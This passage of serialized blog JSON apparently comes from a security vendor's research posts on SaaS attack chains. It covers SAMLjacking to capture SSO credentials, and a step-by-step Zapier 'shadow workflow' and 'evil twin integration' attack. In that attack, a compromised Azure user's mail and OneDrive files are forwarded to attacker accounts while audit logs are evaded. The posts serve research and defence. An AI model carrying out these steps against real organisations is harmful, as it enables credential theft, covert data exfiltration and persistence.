possibility",{"data":60675,"content":60676,"nodeType":860},{},[60677],{"data":60678,"marks":60679,"value":60680,"nodeType":864},{},[],"This compromise occurs when the target sees the email that SSO has been configured and clicks the link in order to link their account to SSO. A smart adversary may improve the social engineering quality with an email sent out in advance informing users that the internal security team has requested Nuclino be linked to SSO. This makes the target expect the email and consider it legitimate. ",{"data":60682,"content":60683,"nodeType":860},{},[60684],{"data":60685,"marks":60686,"value":60687,"nodeType":864},{},[],"Even though the email is an official email from Nuclino and the link contained is an official Nuclino URL, it will immediately redirect to the malicious SAML server that has been configured, where credentials can then be captured.",{"data":60689,"content":60693,"nodeType":996},{"target":60690},{"sys":60691},{"id":60692,"type":1001,"linkType":1002},"6zWiAfBx7aaUeo6t04AtUl",[],{"data":60695,"content":60696,"nodeType":1312},{},[60697],{"data":60698,"marks":60699,"value":60700,"nodeType":864},{},[],"Second compromise possibility",{"data":60702,"content":60703,"nodeType":860},{},[60704],{"data":60705,"marks":60706,"value":60707,"nodeType":864},{},[],"If the user ignores the email, the other potential outcome occurs when their session expires and they need to login again to regain access. This is similar to a watering hole attack. When their session expires, the target’s open tabs or bookmarks will redirect back to the workspace specific login page, which will now look like this:",{"data":60709,"content":60713,"nodeType":996},{"target":60710},{"sys":60711},{"id":60712,"type":1001,"linkType":1002},"580CvVtdyEpqdiK8T1lSfQ",[],{"data":60715,"content":60716,"nodeType":860},{},[60717],{"data":60718,"marks":60719,"value":60720,"nodeType":864},{},[],"Clicking the button to login with SSO will immediately redirect to the malicious SAML server and launch the attack. Alternatively, if the target attempts to login without SSO, the login will fail with an error message telling them to login with SSO.",{"data":60722,"content":60723,"nodeType":860},{},[60724],{"data":60725,"marks":60726,"value":60727,"nodeType":864},{},[],"Either way, once the SAMLjacking has taken effect, they’ll be faced with a familiar-looking SSO login page from a trusted source at a point they are expecting to enter their credentials - something even the most paranoid of users could easily fall for unknowingly. ",{"data":60729,"content":60733,"nodeType":996},{"target":60730},{"sys":60731},{"id":60732,"type":1001,"linkType":1002},"5eFctGgFywtmhhjaXVraqN",[],{"data":60735,"content":60736,"nodeType":1009},{},[60737],{"data":60738,"marks":60739,"value":58288,"nodeType":864},{},[],{"data":60741,"content":60742,"nodeType":860},{},[60743],{"data":60744,"marks":60745,"value":60746,"nodeType":864},{},[],"At this point, having compromised multiple user’s Google credentials, an adversary has a lot of options available:",{"data":60748,"content":60749,"nodeType":941},{},[60750,60760,60770,60792],{"data":60751,"content":60752,"nodeType":945},{},[60753],{"data":60754,"content":60755,"nodeType":860},{},[60756],{"data":60757,"marks":60758,"value":60759,"nodeType":864},{},[],"Access all data in Google apps like GMail, Google Drive etc",{"data":60761,"content":60762,"nodeType":945},{},[60763],{"data":60764,"content":60765,"nodeType":860},{},[60766],{"data":60767,"marks":60768,"value":60769,"nodeType":864},{},[],"Access other SaaS apps that use SSO with the same Google account",{"data":60771,"content":60772,"nodeType":945},{},[60773],{"data":60774,"content":60775,"nodeType":860},{},[60776,60780,60789],{"data":60777,"marks":60778,"value":60779,"nodeType":864},{},[],"Access other SaaS apps that use ",{"data":60781,"content":60783,"nodeType":883},{"uri":60782},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/passwordless_logins/description.md",[60784],{"data":60785,"marks":60786,"value":60788,"nodeType":864},{},[60787],{"type":1455},"passwordless logins",{"data":60790,"marks":60791,"value":21,"nodeType":864},{},[],{"data":60793,"content":60794,"nodeType":945},{},[60795],{"data":60796,"content":60797,"nodeType":860},{},[60798,60802,60811],{"data":60799,"marks":60800,"value":60801,"nodeType":864},{},[],"Access other SaaS apps via email ",{"data":60803,"content":60805,"nodeType":883},{"uri":60804},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/account_recovery/description.md",[60806],{"data":60807,"marks":60808,"value":60810,"nodeType":864},{},[60809],{"type":1455},"account recovery",{"data":60812,"marks":60813,"value":21,"nodeType":864},{},[],{"data":60815,"content":60816,"nodeType":860},{},[60817],{"data":60818,"marks":60819,"value":60820,"nodeType":864},{},[],"Essentially, this can potentially lead to a compromise of every SaaS application accessible by the compromised user - all from the use of a poisoned tenant for an app with no particularly sensitive data or permissions.",{"data":60822,"content":60823,"nodeType":1312},{},[60824],{"data":60825,"marks":60826,"value":24968,"nodeType":864},{},[],{"data":60828,"content":60829,"nodeType":860},{},[60830],{"data":60831,"marks":60832,"value":60833,"nodeType":864},{},[],"We have seen how two new SaaS-focused attack techniques can be combined into one more effective attack chain. This shows how a successful poisoned tenant attack for even a low risk app can still be a significant threat when combined with a SAMLjacking attack. ",{"data":60835,"content":60836,"nodeType":860},{},[60837],{"data":60838,"marks":60839,"value":60840,"nodeType":864},{},[],"This demonstrates even the least sensitive edge cases of SaaS sprawl can represent a vector to laterally move to compromise much more valuable assets. History taught us that protecting core production assets was not enough. Adversaries often achieved compromises via test systems and unsecured development resources. What we are seeing now is that this parallel exists in the SaaS-native world too. Therefore, we need to be protecting all SaaS resources with greater vigilance than their standalone sensitivity would indicate.",{"data":60842,"content":60843,"nodeType":860},{},[60844],{"data":60845,"marks":60846,"value":60847,"nodeType":864},{},[],"So what can be done about it? Well, like much in security, there is no silver bullet solution to this issue. SaaS apps are here to stay and are designed to be flexible, easy to sign up for and use. The key first step is always to get good visibility into the SaaS sprawl across your organization. If certain employees or teams start making use of a new SaaS app (or a new tenant for an existing one), that’s probably something your security team should be aware of so they can make sure it’s legitimate and being used as securely as possible. ","In this article, we’re going to demo combining two of our favorite new SaaS attack techniques to make a simple, but effective attack chain.\n","2023-08-17T00:00:00.000Z",{"items":60851},[60852,60854],{"sys":60853,"name":6593},{"id":6592},{"sys":60855,"name":342},{"id":6596},{"items":60857},[60858],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":60859},{"url":4955},{"__typename":2059,"sys":60861,"content":60863,"title":61741,"synopsis":60873,"hashTags":59,"publishedDate":61742,"slug":61743,"tagsCollection":61744,"authorsCollection":61750},{"id":60862},"7ygI4NLJ2zpuiVwAlggkTG",{"json":60864},{"data":60865,"content":60866,"nodeType":856},{},[60867,60874,60881,60911,60918,60925,60944,60951,60958,60965,60994,61000,61007,61023,61030,61037,61071,61078,61085,61092,61099,61106,61112,61119,61126,61133,61141,61148,61168,61175,61182,61189,61196,61203,61210,61217,61224,61231,61237,61244,61264,61271,61290,61296,61302,61308,61315,61322,61329,61335,61341,61348,61355,61362,61369,61376,61382,61400,61420,61427,61433,61439,61446,61453,61460,61467,61490,61496,61502,61509,61516,61523,61534,61540,61547,61553,61559,61566,61573,61580,61586,61592,61598,61605,61721,61727,61734],{"data":60868,"content":60869,"nodeType":860},{},[60870],{"data":60871,"marks":60872,"value":60873,"nodeType":864},{},[],"In this article, we’re going to demonstrate how combining two of our favorite new SaaS attack techniques makes a simple, but very stealthy persistence approach.",{"data":60875,"content":60876,"nodeType":860},{},[60877],{"data":60878,"marks":60879,"value":60880,"nodeType":864},{},[],"—----",{"data":60882,"content":60883,"nodeType":860},{},[60884,60888,60895,60899,60908],{"data":60885,"marks":60886,"value":60887,"nodeType":864},{},[],"This is the second post in a series on attack chains formed by combining techniques in the ",{"data":60889,"content":60890,"nodeType":883},{"uri":6418},[60891],{"data":60892,"marks":60893,"value":5765,"nodeType":864},{},[60894],{"type":1455},{"data":60896,"marks":60897,"value":60898,"nodeType":864},{},[],". Last post we wrote about ",{"data":60900,"content":60903,"nodeType":57700},{"target":60901},{"sys":60902},{"id":58881,"type":1001,"linkType":1002},[60904],{"data":60905,"marks":60906,"value":5236,"nodeType":864},{},[60907],{"type":1455},{"data":60909,"marks":60910,"value":10094,"nodeType":864},{},[],{"data":60912,"content":60913,"nodeType":860},{},[60914],{"data":60915,"marks":60916,"value":60917,"nodeType":864},{},[],"This time we’ll be looking at combining shadow workflows with an evil twin integration for an especially sneaky and flexible method of persistence. We’ll be using Zapier integrating with Azure as our primary example. ",{"data":60919,"content":60920,"nodeType":1009},{},[60921],{"data":60922,"marks":60923,"value":60924,"nodeType":864},{},[],"What is a shadow workflow?",{"data":60926,"content":60927,"nodeType":860},{},[60928,60932,60940],{"data":60929,"marks":60930,"value":60931,"nodeType":864},{},[],"A ",{"data":60933,"content":60934,"nodeType":883},{"uri":59957},[60935],{"data":60936,"marks":60937,"value":60939,"nodeType":864},{},[60938],{"type":1455},"shadow workflow ",{"data":60941,"marks":60942,"value":60943,"nodeType":864},{},[],"is a technique for using SaaS automation apps to provide a code execution-like method for conducting malicious actions from a legitimate source using OAuth integrations. This could be a daily export of files from shared cloud drives, automatic forwarding and deleting of emails, cloning instant messages, exporting user directories — basically anything that is possible using the target app’s API. ",{"data":60945,"content":60946,"nodeType":860},{},[60947],{"data":60948,"marks":60949,"value":60950,"nodeType":864},{},[],"The fact automation apps utilize OAuth integrations means they also function as a very effective method of maintaining persistence. Think of shadow workflows as the offensive PowerShell of the SaaS world. ",{"data":60952,"content":60953,"nodeType":1009},{},[60954],{"data":60955,"marks":60956,"value":60957,"nodeType":864},{},[],"What’s an evil twin integration?",{"data":60959,"content":60960,"nodeType":860},{},[60961],{"data":60962,"marks":60963,"value":60964,"nodeType":864},{},[],"Creating a new OAuth integration, even if using a legitimate SaaS application, could be viewed as suspicious if seen by a security team or the affected user. This is especially true if an account compromise is discovered and an IR team sees a consent for a new OAuth integration in the log that the compromised user does not recognize. ",{"data":60966,"content":60967,"nodeType":860},{},[60968,60972,60980,60984,60990],{"data":60969,"marks":60970,"value":60971,"nodeType":864},{},[],"An ",{"data":60973,"content":60974,"nodeType":883},{"uri":39722},[60975],{"data":60976,"marks":60977,"value":60979,"nodeType":864},{},[60978],{"type":1455},"evil twin integration",{"data":60981,"marks":60982,"value":60983,"nodeType":864},{},[],", however, reduces the chances of discovery by reusing an existing ",{"data":60985,"marks":60986,"value":60989,"nodeType":864},{},[60987,60988],{"type":2246},{"type":899},"legitimate",{"data":60991,"marks":60992,"value":60993,"nodeType":864},{},[]," integration for malicious purposes.",{"data":60995,"content":60996,"nodeType":1009},{},[60997],{"data":60998,"marks":60999,"value":60484,"nodeType":864},{},[],{"data":61001,"content":61002,"nodeType":860},{},[61003],{"data":61004,"marks":61005,"value":61006,"nodeType":864},{},[],"While shadow workflows are incredibly powerful on their own, as malicious use of OAuth integrations becomes more common, security teams will start regularly checking for new, or unknown, integrations in response to security incidents. While automation apps are legitimate SaaS services, shadow workflow attacks could still raise question marks during incident response if it’s connected shortly after a compromise and/or if the affected user has no knowledge of it. ",{"data":61008,"content":61009,"nodeType":860},{},[61010,61014,61019],{"data":61011,"marks":61012,"value":61013,"nodeType":864},{},[],"Additionally, as use of security tools that ",{"data":61015,"marks":61016,"value":61018,"nodeType":864},{},[61017],{"type":1455},"provide visibility of OAuth integrations",{"data":61020,"marks":61021,"value":61022,"nodeType":864},{},[]," (check out our product) increases, it will become increasingly dangerous for an adversary to create a new OAuth integration. That’s because the target user and possibly even security teams may be notified.",{"data":61024,"content":61025,"nodeType":860},{},[61026],{"data":61027,"marks":61028,"value":61029,"nodeType":864},{},[],"This leads us on to evil twin integrations. Their power is in making use of existing integrations so they can avoid appearing as a new integration and getting flagged or sending alerts to security teams. That makes them much stealthier and increases the likelihood of a successful attack. ",{"data":61031,"content":61032,"nodeType":860},{},[61033],{"data":61034,"marks":61035,"value":61036,"nodeType":864},{},[],"There are three possibilities here that lead to two different levels of stealth for the attack:",{"data":61038,"content":61039,"nodeType":61070},{},[61040,61050,61060],{"data":61041,"content":61042,"nodeType":945},{},[61043],{"data":61044,"content":61045,"nodeType":860},{},[61046],{"data":61047,"marks":61048,"value":61049,"nodeType":864},{},[],"Medium stealth option: Making use of an automation app used legitimately by the organization, but not by the target user, specifically",{"data":61051,"content":61052,"nodeType":945},{},[61053],{"data":61054,"content":61055,"nodeType":860},{},[61056],{"data":61057,"marks":61058,"value":61059,"nodeType":864},{},[],"High stealth option 1: Making use of an automation app used legitimately by the target user themselves",{"data":61061,"content":61062,"nodeType":945},{},[61063],{"data":61064,"content":61065,"nodeType":860},{},[61066],{"data":61067,"marks":61068,"value":61069,"nodeType":864},{},[],"High stealth option 2: Making use of an automation app that has been granted admin consent","ordered-list",{"data":61072,"content":61073,"nodeType":1312},{},[61074],{"data":61075,"marks":61076,"value":61077,"nodeType":864},{},[],"Medium stealth option: Pre-existing use by organization",{"data":61079,"content":61080,"nodeType":860},{},[61081],{"data":61082,"marks":61083,"value":61084,"nodeType":864},{},[],"This option is by far the most likely option to be applicable in a real-world situation. Here’s how it works:",{"data":61086,"content":61087,"nodeType":860},{},[61088],{"data":61089,"marks":61090,"value":61091,"nodeType":864},{},[],"The consent for the targeted user will be new and will generate an audit event to show that, but the integration itself will not be new inside the organization and may even be formally approved by the security team already. This will help evade general detection mechanisms as it won’t be seen as a brand new integration at the organization level that requires careful scrutiny. It’s much harder to evaluate new consents on a per-user basis for existing integrations if the organization is of any significant size.",{"data":61093,"content":61094,"nodeType":860},{},[61095],{"data":61096,"marks":61097,"value":61098,"nodeType":864},{},[],"The downside, however, is that this attack stands a greater chance of detection if notifications are delivered directly to the affected user. Alternatively, if the original compromise is discovered, incident responders are more likely to discover this consent during an investigation. That’s because the affected user would know they aren’t using the automation app and incident responders are likely to explore logs showing consents to new OAuth integrations and permissions shortly after a successful compromise.",{"data":61100,"content":61101,"nodeType":860},{},[61102],{"data":61103,"marks":61104,"value":61105,"nodeType":864},{},[],"Using Azure as an example, while no new service principal is created in this case, the audit logs still show a new consent for the targeted user to the existing Zapier app: ",{"data":61107,"content":61111,"nodeType":996},{"target":61108},{"sys":61109},{"id":61110,"type":1001,"linkType":1002},"7m0E0sOulc348jhQguQLb1",[],{"data":61113,"content":61114,"nodeType":1312},{},[61115],{"data":61116,"marks":61117,"value":61118,"nodeType":864},{},[],"High stealth option 1: Pre-existing use by targeted user",{"data":61120,"content":61121,"nodeType":860},{},[61122],{"data":61123,"marks":61124,"value":61125,"nodeType":864},{},[],"This is the holy grail option, but is likely to require more luck in the real world. It requires that the target user is already using an automation app, which the adversary could compromise and utilize. If the compromised user has already consented to permissions useful to the adversary, such as access to sensitive data like email and file stores, then new malicious workflows can be created without requiring the user to consent to new permissions. ",{"data":61127,"content":61128,"nodeType":860},{},[61129],{"data":61130,"marks":61131,"value":61132,"nodeType":864},{},[],"Consequently, there will be no new integration observed at the organization level, no new user-specific consents for sensitive permissions and the target user would indicate they’re just using a legitimate app if questioned by incident responders. ",{"data":61134,"content":61135,"nodeType":860},{},[61136],{"data":61137,"marks":61138,"value":61140,"nodeType":864},{},[61139],{"type":899},"None of the three audit log entries shown above would be present in this scenario either.",{"data":61142,"content":61143,"nodeType":1312},{},[61144],{"data":61145,"marks":61146,"value":61147,"nodeType":864},{},[],"High stealth option 2: Azure admin consented app",{"data":61149,"content":61150,"nodeType":860},{},[61151,61155,61164],{"data":61152,"marks":61153,"value":61154,"nodeType":864},{},[],"There is a mixed scenario when permissions for an automation app (or any app you want to use for an evil twin integration) have been granted tenant-wide ",{"data":61156,"content":61158,"nodeType":883},{"uri":61157},"https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/user-admin-consent-overview#admin-consent",[61159],{"data":61160,"marks":61161,"value":61163,"nodeType":864},{},[61162],{"type":1455},"admin consent in Azure",{"data":61165,"marks":61166,"value":61167,"nodeType":864},{},[],". In this case, the administrator has effectively consented to permissions for all users, even if they aren’t currently active users of the app. ",{"data":61169,"content":61170,"nodeType":860},{},[61171],{"data":61172,"marks":61173,"value":61174,"nodeType":864},{},[],"This means when a new user integrates the app, it does not generate a new permission grant since it is effectively already granted. Consequently, the three log entries shown above would not be present in this scenario even if integrating the app for a user that has never used it before.",{"data":61176,"content":61177,"nodeType":860},{},[61178],{"data":61179,"marks":61180,"value":61181,"nodeType":864},{},[],"This gives the best level of flexibility for an adversary as they can avoid generating new permission grant logs for any user. However, it's not quite as stealthy as when the targeted user already makes use of the app as there is no history of legitimate app logins or activity for the user prior to the compromise to blend in with.",{"data":61183,"content":61184,"nodeType":1009},{},[61185],{"data":61186,"marks":61187,"value":61188,"nodeType":864},{},[],"An example attack - Zapier",{"data":61190,"content":61191,"nodeType":860},{},[61192],{"data":61193,"marks":61194,"value":61195,"nodeType":864},{},[],"In this case, we’re going to use Zapier as our automation app example and Azure as the primary target for integrations and there will be no admin consent involved. We’ll also be using Google Workspace for data exfiltration. There are many other examples we could have used here, though - Make.com, IFTTT, Retool, Tines, Microsoft Power Automate and many other SaaS apps have powerful automation and integration capabilities and could be used for similar purposes. ",{"data":61197,"content":61198,"nodeType":860},{},[61199],{"data":61200,"marks":61201,"value":61202,"nodeType":864},{},[],"Azure and Google Workspace are also obvious juicy targets for integrations, but automation apps support integrations with vast numbers of other SaaS applications,so there are many possible targets.",{"data":61204,"content":61205,"nodeType":860},{},[61206],{"data":61207,"marks":61208,"value":61209,"nodeType":864},{},[],"So, let’s say we’ve compromised a target user’s Azure account. Perhaps we have conducted a successful credential stuffing attack, a phishing attack including MFA code proxying or even achieved a traditional endpoint compromise and have stolen the user’s session tokens.",{"data":61211,"content":61212,"nodeType":860},{},[61213],{"data":61214,"marks":61215,"value":61216,"nodeType":864},{},[],"Whatever the case, we have temporary control of the user’s account, either until the session expires or the user changes their password. If the original compromise is detected, that could happen quickly, so we want to conduct some malicious actions to make use of the access while we have it and to also gain persistence so we maintain our access beyond a password change.",{"data":61218,"content":61219,"nodeType":860},{},[61220],{"data":61221,"marks":61222,"value":61223,"nodeType":864},{},[],"We want to use an automation app, but we’d prefer to be as stealthy as possible by also making it an evil twin integration. We’d like to see if the target user has existing integrations with any apps we’d like to use - especially an automation app for that high stealth option we mentioned above. ",{"data":61225,"content":61226,"nodeType":860},{},[61227],{"data":61228,"marks":61229,"value":61230,"nodeType":864},{},[],"We’ve created a video demo of the full attack below. A step by step write up with more detail then follows:",{"data":61232,"content":61236,"nodeType":996},{"target":61233},{"sys":61234},{"id":61235,"type":1001,"linkType":1002},"E1ZHBcjGLZAno0SRtJ3d3",[],{"data":61238,"content":61239,"nodeType":1009},{},[61240],{"data":61241,"marks":61242,"value":61243,"nodeType":864},{},[],"Step 1 - Enumerating potential targets",{"data":61245,"content":61246,"nodeType":860},{},[61247,61251,61260],{"data":61248,"marks":61249,"value":61250,"nodeType":864},{},[],"We could perform something as simple as an email search for evidence of sign-ups, but that won’t necessarily show us if actual OAuth integrations have been configured and what permissions are in use. What we really need is a way to perform an ",{"data":61252,"content":61254,"nodeType":883},{"uri":61253},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/oauth_token_enumeration/description.md",[61255],{"data":61256,"marks":61257,"value":61259,"nodeType":864},{},[61258],{"type":1455},"OAuth token enumeration",{"data":61261,"marks":61262,"value":61263,"nodeType":864},{},[]," attack.",{"data":61265,"content":61266,"nodeType":1312},{},[61267],{"data":61268,"marks":61269,"value":61270,"nodeType":864},{},[],"The first method: myapps.microsoft.com",{"data":61272,"content":61273,"nodeType":860},{},[61274,61278,61286],{"data":61275,"marks":61276,"value":61277,"nodeType":864},{},[],"Make use of ",{"data":61279,"content":61281,"nodeType":883},{"uri":61280},"https://myapps.microsoft.com",[61282],{"data":61283,"marks":61284,"value":61280,"nodeType":864},{},[61285],{"type":1455},{"data":61287,"marks":61288,"value":61289,"nodeType":864},{},[]," to see which apps are listed and which permissions have been granted. We can see Zapier is in use and the user has granted it access to their email and files, making it a great target.",{"data":61291,"content":61295,"nodeType":996},{"target":61292},{"sys":61293},{"id":61294,"type":1001,"linkType":1002},"6dDez7xRZjliEJR6DAkWHa",[],{"data":61297,"content":61301,"nodeType":996},{"target":61298},{"sys":61299},{"id":61300,"type":1001,"linkType":1002},"7M0imWv4n3z1RYQu3AdMF5",[],{"data":61303,"content":61307,"nodeType":996},{"target":61304},{"sys":61305},{"id":61306,"type":1001,"linkType":1002},"3fwFBK03tc5g064k0IyADO",[],{"data":61309,"content":61310,"nodeType":1312},{},[61311],{"data":61312,"marks":61313,"value":61314,"nodeType":864},{},[],"The second method: Microsoft’s graph API",{"data":61316,"content":61317,"nodeType":860},{},[61318],{"data":61319,"marks":61320,"value":61321,"nodeType":864},{},[],"\nMicrosoft’s graph API doesn’t make it possible to list out service principals without admin permissions, but you can enumerate individual OAuth permission grants and app role assignments for your own user account. ",{"data":61323,"content":61324,"nodeType":860},{},[61325],{"data":61326,"marks":61327,"value":61328,"nodeType":864},{},[],"The client ID listed for permission grants is actually the tenant-specific service principal ID, rather than the globally unique OAuth app ID, but the app role assignments call gives us the app display name. We can match up the IDs from the app role assignments with the OAuth permission grants to see which permissions have been granted to the given app. ",{"data":61330,"content":61334,"nodeType":996},{"target":61331},{"sys":61332},{"id":61333,"type":1001,"linkType":1002},"519mlRMbaZYBAVdSADwop7",[],{"data":61336,"content":61340,"nodeType":996},{"target":61337},{"sys":61338},{"id":61339,"type":1001,"linkType":1002},"3g4WBQBEvqx5mXXnZzZzUG",[],{"data":61342,"content":61343,"nodeType":1009},{},[61344],{"data":61345,"marks":61346,"value":61347,"nodeType":864},{},[],"Step 2 - Create shadow workflows",{"data":61349,"content":61350,"nodeType":860},{},[61351],{"data":61352,"marks":61353,"value":61354,"nodeType":864},{},[],"Ok, so we’ve figured out the user already makes use of Zapier and they’ve even already granted access to their email and files - that’s a juicy target we can’t turn down! So the next step is to create our own malicious workflows, or shadow workflows if you will, to get Zapier to do our dirty work for us.",{"data":61356,"content":61357,"nodeType":860},{},[61358],{"data":61359,"marks":61360,"value":61361,"nodeType":864},{},[],"First of all, we’ll see if we can scope out the user’s existing Zapier account to better understand the setup. Then we’ll create a new Zapier account and link it to the target user’s account that we’ve compromised. Here’s how that would work:",{"data":61363,"content":61364,"nodeType":1312},{},[61365],{"data":61366,"marks":61367,"value":61368,"nodeType":864},{},[],"Scope out the existing Zapier account",{"data":61370,"content":61371,"nodeType":860},{},[61372],{"data":61373,"marks":61374,"value":61375,"nodeType":864},{},[],"If the user uses SSO or social logins then we can login directly and, since we now control their Azure account, we can just log directly into their Zapier account!",{"data":61377,"content":61381,"nodeType":996},{"target":61378},{"sys":61379},{"id":61380,"type":1001,"linkType":1002},"5IgmxUEm6n19OBL1cSZVkr",[],{"data":61383,"content":61384,"nodeType":860},{},[61385,61389,61396],{"data":61386,"marks":61387,"value":61388,"nodeType":864},{},[],"Alternatively, if they have created a standard password account, then we might already know the password if it’s the same used for their Azure account. Otherwise, we could potentially make use of an ",{"data":61390,"content":61391,"nodeType":883},{"uri":60804},[61392],{"data":61393,"marks":61394,"value":60810,"nodeType":864},{},[61395],{"type":1455},{"data":61397,"marks":61398,"value":61399,"nodeType":864},{},[]," attack to gain access.",{"data":61401,"content":61402,"nodeType":860},{},[61403,61407,61416],{"data":61404,"marks":61405,"value":61406,"nodeType":864},{},[],"Once we have logged into their account, we can see their existing workflows and integrations. Technically, we could backdoor these or create new ones - a form of an ",{"data":61408,"content":61410,"nodeType":883},{"uri":61409},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/abuse_existing_oauth_integrations/description.md",[61411],{"data":61412,"marks":61413,"value":61415,"nodeType":864},{},[61414],{"type":1455},"abuse existing OAuth integrations",{"data":61417,"marks":61418,"value":61419,"nodeType":864},{},[]," attack. However, that runs the risk of the user discovering our shadow workflows and also almost certainly being locked out of the account during the next password change. ",{"data":61421,"content":61422,"nodeType":860},{},[61423],{"data":61424,"marks":61425,"value":61426,"nodeType":864},{},[],"Instead, we can stick to an evil twin integration from our own Zapier account, which we’ll create later.",{"data":61428,"content":61432,"nodeType":996},{"target":61429},{"sys":61430},{"id":61431,"type":1001,"linkType":1002},"2vhyTcVLq27QVa2HFFWBhH",[],{"data":61434,"content":61438,"nodeType":996},{"target":61435},{"sys":61436},{"id":61437,"type":1001,"linkType":1002},"3jPSdBPSQgigA4yKK1udCV",[],{"data":61440,"content":61441,"nodeType":860},{},[61442],{"data":61443,"marks":61444,"value":61445,"nodeType":864},{},[],"Now we can see what the user was actually using Zapier for — they’ve set up an integration with both Outlook and OneDrive so they can forward emails related to their business expenses to a folder in their OneDrive. Probably a time-saving hack, which we can take advantage of since it won’t be unusual to see Zapier regularly accessing their Outlook and OneDrive. That means our attack will be extra stealthy.",{"data":61447,"content":61448,"nodeType":1312},{},[61449],{"data":61450,"marks":61451,"value":61452,"nodeType":864},{},[],"Create our own malicious Zapier account",{"data":61454,"content":61455,"nodeType":860},{},[61456],{"data":61457,"marks":61458,"value":61459,"nodeType":864},{},[],"Given in this case we, at least temporarily, control the user’s Azure account there is nothing stopping us connecting this to our own malicious Zapier account completely separately from the user’s legitimate Zapier account. We then maintain full control over the Zapier account and the user will not be able to discover our shadow workflows as they won’t have any knowledge of our Zapier account: ",{"data":61461,"content":61462,"nodeType":860},{},[61463],{"data":61464,"marks":61465,"value":61466,"nodeType":864},{},[],"Let’s create our own shadow workflows:",{"data":61468,"content":61469,"nodeType":941},{},[61470,61480],{"data":61471,"content":61472,"nodeType":945},{},[61473],{"data":61474,"content":61475,"nodeType":860},{},[61476],{"data":61477,"marks":61478,"value":61479,"nodeType":864},{},[],"One that sends every new OneDrive file to our own separate Google Drive account. This allows us to maintain a complete view of the user’s files into the future. ",{"data":61481,"content":61482,"nodeType":945},{},[61483],{"data":61484,"content":61485,"nodeType":860},{},[61486],{"data":61487,"marks":61488,"value":61489,"nodeType":864},{},[],"And one to forward every new Outlook email to our own GMail account.",{"data":61491,"content":61495,"nodeType":996},{"target":61492},{"sys":61493},{"id":61494,"type":1001,"linkType":1002},"6eK8uNjPnkrfVjgFzl03SM",[],{"data":61497,"content":61501,"nodeType":996},{"target":61498},{"sys":61499},{"id":61500,"type":1001,"linkType":1002},"6xJvuS374tbflAoNmhnqYP",[],{"data":61503,"content":61504,"nodeType":860},{},[61505],{"data":61506,"marks":61507,"value":61508,"nodeType":864},{},[],"We can now see we are logged in with a separate GMail account, but have created shadow workflows to forward emails from the user’s Outlook to our GMail account and harvest files from their OneDrive to our Google Drive.",{"data":61510,"content":61511,"nodeType":860},{},[61512],{"data":61513,"marks":61514,"value":61515,"nodeType":864},{},[],"The major benefit of creating our own Zapier account for an evil twin integration is that once we are locked out of the target user’s account via a password change or otherwise, not only do our existing shadow workflows continue to operate via OAuth, but we are able to create new shadow workflows and reuse the existing OAuth connections. That’s the power of having full control of the Zapier account. ",{"data":61517,"content":61518,"nodeType":860},{},[61519],{"data":61520,"marks":61521,"value":61522,"nodeType":864},{},[],"One small downside to this approach is that creating the new OAuth integrations inside a new Zapier account generates an interactive login event for the Zapier integrations from the adversary’s IP address. This occurs due to creating integrations from the new Zapier account, but because the user has already consented to all the relevant permissions for Zapier’s own OAuth apps there are no audit logs for new consents or applications, just the login event itself. ",{"data":61524,"content":61525,"nodeType":860},{},[61526,61530],{"data":61527,"marks":61528,"value":61529,"nodeType":864},{},[],"However, determining that a successful login to an app a user legitimately uses is actually malicious in this case is obviously extremely difficult to build detection logic for.   ",{"data":61531,"marks":61532,"value":14717,"nodeType":864},{},[61533],{"type":2246},{"data":61535,"content":61539,"nodeType":996},{"target":61536},{"sys":61537},{"id":61538,"type":1001,"linkType":1002},"1oZBtlL8rNl7TjmfJqRjUG",[],{"data":61541,"content":61542,"nodeType":860},{},[61543],{"data":61544,"marks":61545,"value":61546,"nodeType":864},{},[],"Beyond the initial login events, the only evidence of malicious activity in the future will be from the activity logs showing the actions conducted by our shadow workflows every time they are triggered to run. For example, the following screenshots show that the Zapier Todo app (ClientAppId 29246358-1970-4d6d-bc75-acf34edc758b) has been seen both uploading a file and downloading a file: \n",{"data":61548,"content":61552,"nodeType":996},{"target":61549},{"sys":61550},{"id":61551,"type":1001,"linkType":1002},"2vYOSilB5W05aIHw2ZKqdC",[],{"data":61554,"content":61558,"nodeType":996},{"target":61555},{"sys":61556},{"id":61557,"type":1001,"linkType":1002},"2fFwrdFO25BwY4vI7EKMA0",[],{"data":61560,"content":61561,"nodeType":860},{},[61562],{"data":61563,"marks":61564,"value":61565,"nodeType":864},{},[],"The file upload in this case relates to the legitimate workflow and the file download relates to the shadow workflow. The IP addresses relate to Zapier’s legitimate infrastructure so really only a very thorough and specific investigation is going to be able to uncover that one of these events is malicious.",{"data":61567,"content":61568,"nodeType":1009},{},[61569],{"data":61570,"marks":61571,"value":61572,"nodeType":864},{},[],"Step 3 - Profit",{"data":61574,"content":61575,"nodeType":860},{},[61576],{"data":61577,"marks":61578,"value":61579,"nodeType":864},{},[],"Now we just need to sit back and let our shadow workflows do the work for us, 24/7 and from Zapier’s infrastructure via a legitimate OAuth integration. Here we can see files the user created in OneDrive and emails they received in Outlook mirrored to our own GMail and Google Drive via the magic of shadow workflows.",{"data":61581,"content":61585,"nodeType":996},{"target":61582},{"sys":61583},{"id":61584,"type":1001,"linkType":1002},"4lJBrdJLEVnhBUjgtGo8T1",[],{"data":61587,"content":61591,"nodeType":996},{"target":61588},{"sys":61589},{"id":61590,"type":1001,"linkType":1002},"azQ3IO0n4Idih5LDwOogV",[],{"data":61593,"content":61594,"nodeType":1009},{},[61595],{"data":61596,"marks":61597,"value":58288,"nodeType":864},{},[],{"data":61599,"content":61600,"nodeType":860},{},[61601],{"data":61602,"marks":61603,"value":61604,"nodeType":864},{},[],"Ok, we’ve covered a lot of ground here so it’s worth taking a step back and considering the key impact points of this attack chain:",{"data":61606,"content":61607,"nodeType":941},{},[61608,61618,61628,61638,61648,61701,61711],{"data":61609,"content":61610,"nodeType":945},{},[61611],{"data":61612,"content":61613,"nodeType":860},{},[61614],{"data":61615,"marks":61616,"value":61617,"nodeType":864},{},[],"An adversary who has gained (temporary) access to a user account that supports OAuth integrations can use shadow workflows to execute malicious actions and to maintain 